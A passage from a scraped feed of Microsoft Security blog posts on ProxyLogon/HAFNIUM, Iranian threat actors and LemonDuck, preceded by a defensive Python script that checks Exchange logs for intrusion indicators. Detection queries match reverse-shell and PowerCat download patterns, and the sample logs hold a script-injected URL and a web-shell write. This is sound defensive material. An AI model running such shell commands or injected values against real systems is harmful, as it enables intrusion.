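The Exchange log checks above, as an added example that is not part of the original post or of Microsoft's CSS-Exchange script: an offline Python triage script that parses HttpProxy logs and applies the empty-AuthenticatedUser / ServerInfo~ AnchorMailbox test, extracts from each hit the backend application whose own logs to pull next, and applies sharper forms of the OAB and ECP checks (only writes outside ClientAccess\OAB\Temp, only Set-*VirtualDirectory URLs that are not plain http(s) URIs or that contain script). The server names, the sample records and the OAB/ECP line layouts are constructed assumptions, and the HttpProxy header is reduced to the columns the script reads.

```python
"""Offline triage of Exchange HttpProxy, OABGeneratorLog and ECP\\Server logs for the
indicators listed above.  Added example, not Microsoft's CSS-Exchange script.  Samples
are constructed: real logs carry many more columns and the OAB/ECP layouts are assumed."""
import csv
import fnmatch
import re
from urllib.parse import urlparse

# Constructed HttpProxy sample.  Exchange writes W3C-style logs: '#' metadata lines,
# with '#Fields:' naming the columns (header layout assumed; reduced to the fields used).
SAMPLE_HTTPPROXY = """\
#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,AuthenticatedUser,UrlStem,AnchorMailbox,BackEndCookie,HttpStatus
2021-03-02T10:00:01.000Z,contoso\\alice,/owa/,SMTP:alice@contoso.com,Server~exch01.contoso.local~1941~0,200
2021-03-02T10:00:07.000Z,,/ecp/y.js,ServerInfo~exch01.contoso.local/ecp/DDI/DDIService.svc/SetObject,,200
2021-03-02T10:00:09.000Z,,/owa/auth/logon.aspx,,,200
2021-03-02T10:00:12.000Z,,/ecp/x.js,ServerInfo~exch01.contoso.local/autodiscover/autodiscover.xml,Server~exch01.contoso.local/autodiscover/autodiscover.xml~1941~0,200
"""
# Constructed OABGeneratorLog and ECP\Server lines (message layouts assumed).
SAMPLE_OAB = """\
2021-03-02T10:00:40Z,Download failed and temporary file C:\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp\\oab.lzx was deleted
2021-03-02T10:00:55Z,Download failed and temporary file \\\\127.0.0.1\\c$\\inetpub\\wwwroot\\aspnet_client\\shell.aspx was deleted
"""
SAMPLE_ECP = """\
2021-03-02T10:00:20Z,S:Cmd=Set-OabVirtualDirectory;S:ExternalUrl=https://mail.contoso.com/OAB
2021-03-02T10:00:31Z,S:Cmd=Set-OabVirtualDirectory;S:ExternalUrl=http://f/<script runat=server>x</script>
2021-03-02T10:01:02Z,S:Cmd=Set-OwaVirtualDirectory;S:InternalUrl=https://mail.contoso.com/owa
"""


def parse_w3c_log(text):
    """One dict per record: '#Fields:' names the columns, other '#' lines are skipped,
    and a plain CSV header row is accepted when no '#Fields:' line is present."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = next(csv.reader([line]))
        if fields is None:
            fields = values
            continue
        rows.append(dict(zip(fields, values)))
    return rows


def find_ssrf_hits(text):
    """CVE-2021-26855: anonymous requests whose backend routing was dictated by an
    AnchorMailbox of 'ServerInfo~host/path' or a BackEndCookie of 'Server~host/path~...'."""
    hits = []
    for row in parse_w3c_log(text):
        if row.get("AuthenticatedUser", "").strip():
            continue  # authenticated front-end proxying is normal traffic
        if (fnmatch.fnmatchcase(row.get("AnchorMailbox", ""), "ServerInfo~*/*")
                or fnmatch.fnmatchcase(row.get("BackEndCookie", ""), "Server~*/*~*")):
            hits.append(row)
    return hits


def anchor_target(anchor):
    """'ServerInfo~host/app/...' -> (host, app); 'app' is the backend whose own logs
    under ...\\V15\\Logging\\<app> show what was done there."""
    m = re.match(r"ServerInfo~([^/]+)/([^/?]+)", anchor)
    return (m.group(1), m.group(2)) if m else None


OAB_TEMP = "\\clientaccess\\oab\\temp\\"


def find_oab_hits(text):
    """CVE-2021-26858: the OAB generator may only write under ClientAccess\\OAB\\Temp; a
    'Download failed and temporary file' line naming any other local or UNC path is the
    indicator (the findstr command above flags every such line, this keeps only those)."""
    return [line for line in text.splitlines()
            if "Download failed and temporary file" in line
            and OAB_TEMP not in line.lower()]


URL_PARAM = re.compile(r"S:(InternalUrl|ExternalUrl)=([^;]*)")


def find_ecp_hits(text):
    """CVE-2021-27065: Set-*VirtualDirectory calls whose InternalUrl/ExternalUrl is not a
    plain http(s) URI or carries script.  An empty value is allowed (clearing a URL)."""
    hits = []
    for line in text.splitlines():
        if not re.search(r"Set-\w+VirtualDirectory", line):
            continue
        for name, value in URL_PARAM.findall(line):
            parsed = urlparse(value)
            if value and ("<script" in value.lower()
                          or parsed.scheme not in ("http", "https") or not parsed.netloc):
                hits.append((name, value))
    return hits


if __name__ == "__main__":
    print(find_ssrf_hits(SAMPLE_HTTPPROXY), find_oab_hits(SAMPLE_OAB), find_ecp_hits(SAMPLE_ECP), sep="\n")
```

Run it against copies of the three log folders taken off the server. Treat any anonymous ServerInfo~ hit with HttpStatus 200 as a lead and pull the logs of the backend application it names (ecp, autodiscover, and so on) for the same minutes, since that is where the subsequent OAB or virtual-directory file write will be recorded.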
This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * 
[Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File 
Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting 
queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-02T21:07:53", "type": "mssecure", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MSSECURE:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. 
We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. 
PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN appliances that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyLogon ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were suitable for actions on objectives. On select victims, operators created local administrator accounts with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. 
On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a legitimate full-volume encryption feature of Windows, abused here to hold the victims\u2019 data hostage. After compromising the initial server (through a vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSPHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the email. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. 
The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed this playbook:\n\n * Masquerade as an attractive woman on social media\n * Connect with the target user on LinkedIn, Facebook, or a similar platform\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar to the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time through constant communication, which earns them the trust and confidence of the target. 
In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. 
For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. 
Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-03-19T21:46:45", "description": "As cybercriminals continue to exploit unpatched on-premises versions of Exchange Server 2013, 2016, and 2019, we continue to actively work with customers and partners to help them secure their environments and respond to associated threats. To date, we have [released a comprehensive Security Update](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), a one-click interim [Exchange On-Premises Mitigation Tool](<https://aka.ms/eomtrelease>) for both current and out-of-support versions of on-premises Exchange Servers, and [step-by-step guidance](<https://aka.ms/exchange-customer-guidance>) to help address these attacks.\n\nToday, we have taken an additional step to further support our customers who are still vulnerable and have not yet implemented the complete security update. With the latest security intelligence update, Microsoft Defender Antivirus and System Center Endpoint Protection will **automatically mitigate** CVE-2021-26855 on any vulnerable Exchange Server on which it is deployed. Customers do not need to take action beyond ensuring they have installed the latest security intelligence update (build **1.333.747.0** or newer), if they do not already have automatic updates turned on.\n\n\n\nThe Exchange security update is still the most comprehensive way to protect your servers from these attacks and others fixed in earlier releases. This interim mitigation is designed to help protect customers while they take the time to implement the latest Exchange Cumulative Update for their version of Exchange.\n\nMicrosoft will provide guidance to our security partners so that they have the option to make available similar, simple mitigations in their products as well.\n\nWe are deeply committed to protecting our customers. 
To stay up to date please continue to review the content posted at <https://aka.ms/exchangevulns>.\n\n### Frequently Asked Questions\n\n**Q: If I have Microsoft Defender Antivirus installed on my Exchange Server do I need to take any further action to get this mitigation?**\n\nA: Customers that install Microsoft Defender Antivirus and have automatic definition updates enabled (default setting) do not have to take further action to receive the mitigation.\n\n**Q: My organization manages Microsoft Defender Antivirus definition updates. What do I need to do to ensure I have this mitigation?**\n\nA: Customers that manage Microsoft Defender Antivirus definition updates need to select the new detection build (**1.333.747.0 or newer**) and deploy that to the Exchange Server.\n\n**Q: After this mitigation, do I still need to install the security update?**\n\nA: Yes. This automatic mitigation breaks the attack chain by mitigating CVE-2021-26855. Customers should still prioritize getting current on security updates for Exchange Server to comprehensively address the vulnerabilities.\n\n**Q: When does Microsoft Defender Antivirus apply the mitigation?**\n\nA: Microsoft Defender Antivirus will automatically identify if a vulnerable version of Exchange Server is installed and apply the mitigations the first time the security intelligence update is deployed. The mitigation is deployed once per machine.\n\n**Q: Is cloud protection required to receive the mitigation?**\n\nA: No. However, enabling cloud protection is a best practice that will keep you with the most current protections against the ever-changing threat environment. 
Customers are encouraged to enable cloud protection.\n\n**Q: What can I do if I don\u2019t have Microsoft Defender Antivirus?**\n\nA: Use the One-Click Microsoft Exchange On-Premises Mitigation Tool found [here](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe post [Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>) appeared first on Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T22:00:47", "type": "mssecure", "title": "Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T22:00:47", "id": "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3", "href": "https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. 
